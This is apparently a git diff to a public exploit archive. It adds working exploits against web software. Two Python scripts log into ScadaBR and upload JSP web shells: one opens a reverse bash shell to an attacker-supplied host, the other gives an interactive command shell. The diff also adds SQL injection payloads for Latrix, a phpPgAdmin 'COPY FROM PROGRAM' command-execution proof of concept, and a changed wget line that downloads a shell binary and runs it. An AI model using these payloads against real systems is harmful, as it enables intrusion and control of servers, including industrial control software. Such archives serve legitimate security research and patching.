diff --git a/exploits/linux/webapps/49735.py b/exploits/linux/webapps/49735.py new file mode 100755 index 000000000..a68e7a479 --- /dev/null +++ b/exploits/linux/webapps/49735.py @@ -0,0 +1,115 @@ +# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2) +# Date: 04/21 +# Exploit Author: Fellipe Oliveira +# Vendor Homepage: https://www.scadabr.com.br/ +# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux +# Tested on: Debian9,10~Ubuntu16.04 + +#!/usr/bin/python + +import requests,sys,time + + +if len(sys.argv) <=6: + print('[x] Missing arguments ... ') + print('[>] Usage: python LinScada_RCE.py ') + print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444') + sys.exit(0) +else: + time.sleep(1) + +host = sys.argv[1] +port = sys.argv[2] +user = sys.argv[3] +passw = sys.argv[4] +rev_host = sys.argv[5] +rev_port = sys.argv[6] + +flag = False +LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' +PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' + + +banner = ''' ++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ +| _________ .___ ____________________ | +| / _____/ ____ _____ __| _/____ \______ \______ \ | +| \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ | +| / \ \___ / __ \_/ /_/ | / __ \| | \| | \ | +| /_______ /\___ >____ /\____ |(____ /______ /|____|_ / | +| \/ \/ \/ \/ \/ \/ \/ | +| | +| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload | +| > Exploit Author : Fellipe Oliveira | +| > Exploit for Linux Systems | ++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ +''' + +def main(): + payload = { + 'username': user, + 'password': passw + } + + print(banner) + time.sleep(2) + + with requests.session() as s: + s.post(LOGIN, data=payload) + response = s.get(PROTECTED_PAGE) + + print "[+] Trying to authenticate "+LOGIN+"..." + if response.status_code == 200: + print "[+] Successfully authenticated! :D~\n" + time.sleep(2) + else: + print "[x] Authentication failed :(" + sys.exit(0) + + + burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm" + burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} + burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"} + burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n InputStream is;\n OutputStream os;\n StreamConnector(InputStream is, OutputStream os) {\n this.is = is;\n this.os = os;\n }\n public void run() {\n BufferedReader isr = null;\n BufferedWriter osw = null;\n try {\n isr = new BufferedReader(new InputStreamReader(is));\n osw = new BufferedWriter(new OutputStreamWriter(os));\n char buffer[] = new char[8192];\n int lenRead;\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n osw.write(buffer, 0, lenRead);\n osw.flush();\n }\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n try {\n if (isr != null)\n isr.close();\n if (osw != null)\n osw.close();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n}\n%>\n\n

Payload JSP to Reverse Shell

\n

Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process

\n
\n\tIP Address\n\tPort\n\t\n
\n\n<%\n String ipAddress = request.getParameter(\"ipaddress\");\n String ipPort = request.getParameter(\"port\");\n Socket sock = null;\n Process proc = null;\n if (ipAddress != null && ipPort != null) {\n try {\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n System.out.println(\"socket created: \" + sock.toString());\n Runtime rt = Runtime.getRuntime();\n proc = rt.exec(\"/bin/bash\");\n System.out.println(\"process /bin/bash started: \" + proc.toString());\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n System.out.println(\"outputConnector created: \" + outputConnector.toString());\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n System.out.println(\"inputConnector created: \" + inputConnector.toString());\n outputConnector.start();\n inputConnector.start();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n if (sock != null && proc != null) {\n out.println(\"
\");\n out.println(\"

Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".

\");\n }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n" + getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) + + + print('[>] Attempting to upload .jsp Webshell...') + time.sleep(1) + print('[>] Verifying shell upload...\n') + time.sleep(2) + + if getdata.status_code == 200: + print('[+] Upload Successfuly! \n') + + for num in range(1,1000): + PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) + find = s.get(PATH) + + if find.status_code == 200: + print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) + print('[>] Spawning Reverse Shell...\n') + time.sleep(3) + + burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port) + burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} + burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} + r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) + time.sleep(5) + + if len(r.text) > 401: + print('[+] Connection received') + sys.exit(0) + else: + print('[x] Failed to receive reverse connection ...\n') + + elif num == 999: + print('[x] Failed to found Webshell ... ') + + else: + print('Reason:'+getdata.reason+' ') + print('Exploit Failed x_x') + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/49383.py b/exploits/multiple/webapps/49383.py index 3e689dfde..11da08305 100755 --- a/exploits/multiple/webapps/49383.py +++ b/exploits/multiple/webapps/49383.py @@ -32,7 +32,7 @@ PASSWORD = "password123" HOST_ADDR = '192.168.1.1' HOST_PORT = 3000 URL = 'http://192.168.1.2:3000' -CMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell' +CMD = 'wget http://192.168.1.1:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell' # Login s = requests.Session() diff --git a/exploits/multiple/webapps/49733.txt b/exploits/multiple/webapps/49733.txt new file mode 100644 index 000000000..0231811d9 --- /dev/null +++ b/exploits/multiple/webapps/49733.txt @@ -0,0 +1,54 @@ +# Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection +# Date: 03/30/2021 +# Exploit Author: cptsticky +# Vendor Homepage: https://sourceforge.net/projects/latrix +# Software Link: https://sourceforge.net/projects/latrix/files/latest/download +# Version: 0.6.0 +# Tested on: Ubuntu 20.04 + +POST /latrix/inandout.php HTTP/1.1 +Host: 18.222.194.190 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 34 +Origin: http://18.222.194.190 +Connection: close +Referer: http://18.222.194.190/latrix/inandoutcode.php?target=inandout +Cookie: PHPSESSID=q9b6a0e050sl6jae7u64usvrs1 +Upgrade-Insecure-Requests: 1 + +txtaccesscode=111&btnsubmit=Submit + + + +Command used to prove injection: sqlmap -r bam.txt -p txtaccesscode + + +Output +----------------snip---------------- +sqlmap resumed the following injection point(s) from stored session: +--- +Parameter: txtaccesscode (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + Payload: txtaccesscode=-3451' OR 7070=7070#&btnsubmit=Submit + + Type: error-based + Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) + Payload: txtaccesscode=111' AND GTID_SUBSET(CONCAT(0x716b627a71,(SELECT (ELT(2717=2717,1))),0x71786a7071),2717)-- GnJe&btnsubmit=Submit + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: txtaccesscode=111' AND (SELECT 8547 FROM (SELECT(SLEEP(5)))qHfx)-- tljS&btnsubmit=Submit + + Type: UNION query + Title: MySQL UNION query (NULL) - 22 columns + Payload: txtaccesscode=111' UNION ALL SELECT CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit +--- +[16:29:27] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan) +web application technology: Apache 2.4.41 +back-end DBMS: MySQL >= 5.6 \ No newline at end of file diff --git a/exploits/multiple/webapps/49736.txt b/exploits/multiple/webapps/49736.txt new file mode 100644 index 000000000..300d9ee2c --- /dev/null +++ b/exploits/multiple/webapps/49736.txt @@ -0,0 +1,15 @@ +# Exploit Title: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated) +# Date: 29/03/2021 +# Exploit Author: Valerio Severini +# Vendor Homepage: Software Link: https://github.com/phppgadmin/phppgadmin/releases/tag/REL_7-13-0 +# Version: 7.13.0 or lower +# Tested on: Debian 10 and Ubuntu + +Description: phpPgAdmin through 7.13.0 allows remote authenticated users to execute arbitrary code. An attacker can create a table named cmd_exec with one column, add type=text and cmd_out, and try to execute the query via a SQL tab. It will fail because of restrictions on statements. However, the attacker can bypass this step by uploading a .txt file (containing a SQL statement such as "COPY cmd_exec FROM PROGRAM" followed by OS commands) in the Browse bar. This achieves remote command execution via a "SELECT * FROM cmd_exec" statement. + +Attack Vectors (PoC): +1) you have to create a table manually and call it "cmd_exec" with 1 column +2) add cmd_output and type = text +3) try to execute the query via SQL tabs , but it should fail because of restriction of Statement. +4) A malicious Attacker could bypass this step uploading a .txt file in "Browse" bar, with a SQL malicious query inside, for example: " COPY cmd_exec FROM PROGRAM 'id; cd /root; ls'; " +5) The attacker could execute Remote command execution and obtain full access control executing in SQL query: " SELECT * FROM cmd_exec; " \ No newline at end of file diff --git a/exploits/windows/webapps/49734.py b/exploits/windows/webapps/49734.py new file mode 100755 index 000000000..289a44ac7 --- /dev/null +++ b/exploits/windows/webapps/49734.py @@ -0,0 +1,110 @@ +# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1) +# Date: 03/2021 +# Exploit Author: Fellipe Oliveira +# Vendor Homepage: https://www.scadabr.com.br/ +# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux +# Tested on: Windows7, Windows10 + +#!/usr/bin/python + +import requests,sys,time + + +if len(sys.argv) <=4: + print('[x] Missing arguments ... ') + print('[>] Usage: python WinScada_RCE.py ') + print('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin') + sys.exit(0) +else: + time.sleep(1) + + +host = sys.argv[1] +port = sys.argv[2] +user = sys.argv[3] +passw = sys.argv[4] + +flag = False +LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' +PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' + + +banner = ''' ++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ +| _________ .___ ____________________ | +| / _____/ ____ _____ __| _/____ \______ \______ \ | +| \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ | +| / \ \___ / __ \_/ /_/ | / __ \| | \| | \ | +| /_______ /\___ >____ /\____ |(____ /______ /|____|_ / | +| \/ \/ \/ \/ \/ \/ \/ | +| | +| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload | +| > Exploit Author : Fellipe Oliveira | +| > Exploit for Windows Systems | ++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ +''' + +def main(): + payload = { + 'username': user, + 'password': passw + } + + print(banner) + time.sleep(2) + + with requests.session() as s: + s.post(LOGIN, data=payload) + response = s.get(PROTECTED_PAGE) + + print("[+] Trying to authenticate "+LOGIN+"...") + if response.status_code == 200: + print("[+] Successfully authenticated! :D~\n") + time.sleep(2) + else: + print("[x] Authentication failed :(") + sys.exit(0) + + burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm" + burp0_cookies = {"JSESSIONID": "66E47DFC053393AFF6C2D5A7C15A9439"} + burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6150838712847095098536245849", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"} + burp0_data = "-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_218627\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"win_cmd.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n%>\n\nCommands with JSP\n
\n\n\n
\n
\n<%\nif (request.getParameter(\"cmd\") != null) {\n    out.println(\"Command: \" + request.getParameter(\"cmd\") + \"
\");\n Process p;\n if ( System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n p = Runtime.getRuntime().exec(\"cmd.exe /C \" + request.getParameter(\"cmd\"));\n }\n else{\n p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n }\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n }\n}\n%>\n
\n\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------6150838712847095098536245849--\r\n" + getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) + + print('[>] Attempting to upload .jsp Webshell...') + time.sleep(1) + print('[>] Verifying shell upload...\n') + time.sleep(2) + + if getdata.status_code == 200: + print('[+] Upload Successfuly!') + + for num in range(1,500): + PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) + find = s.get(PATH) + + if find.status_code == 200: + print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) + flag = True + print('[>] Spawning fake shell...') + time.sleep(3) + + while flag: + param = raw_input("# ") + burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s" % (num,param) + burp0_cookies = {"JSESSIONID": "4FCC12402B8389A64905F4C8272A64B5"} + burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s", "Upgrade-Insecure-Requests": "1"} + send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) + clean = send.text.replace('
', '').replace('
', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('', '').replace('', '').replace('
', '').replace('
', '').replace('
', '').replace('', '') + print(clean) + + elif num == 499: + print('[x] Webshell not Found') + + else: + print('Reason:'+getdata.reason+' ') + print('Exploit Failed x_x') + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f08d7771f..13442679f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43910,3 +43910,7 @@ id,file,description,date,author,type,platform,port 49727,exploits/multiple/webapps/49727.txt,"Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting",2021-03-30,cmOs,webapps,multiple, 49729,exploits/php/webapps/49729.txt,"Zabbix 3.4.7 - Stored XSS",2021-03-31,"Radmil Gazizov",webapps,php, 49731,exploits/multiple/webapps/49731.txt,"CourseMS 2.1 - 'name' Stored XSS",2021-03-31,cptsticky,webapps,multiple, +49733,exploits/multiple/webapps/49733.txt,"Latrix 0.6.0 - 'txtaccesscode' SQL Injection",2021-04-01,cptsticky,webapps,multiple, +49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows, +49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple, +49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,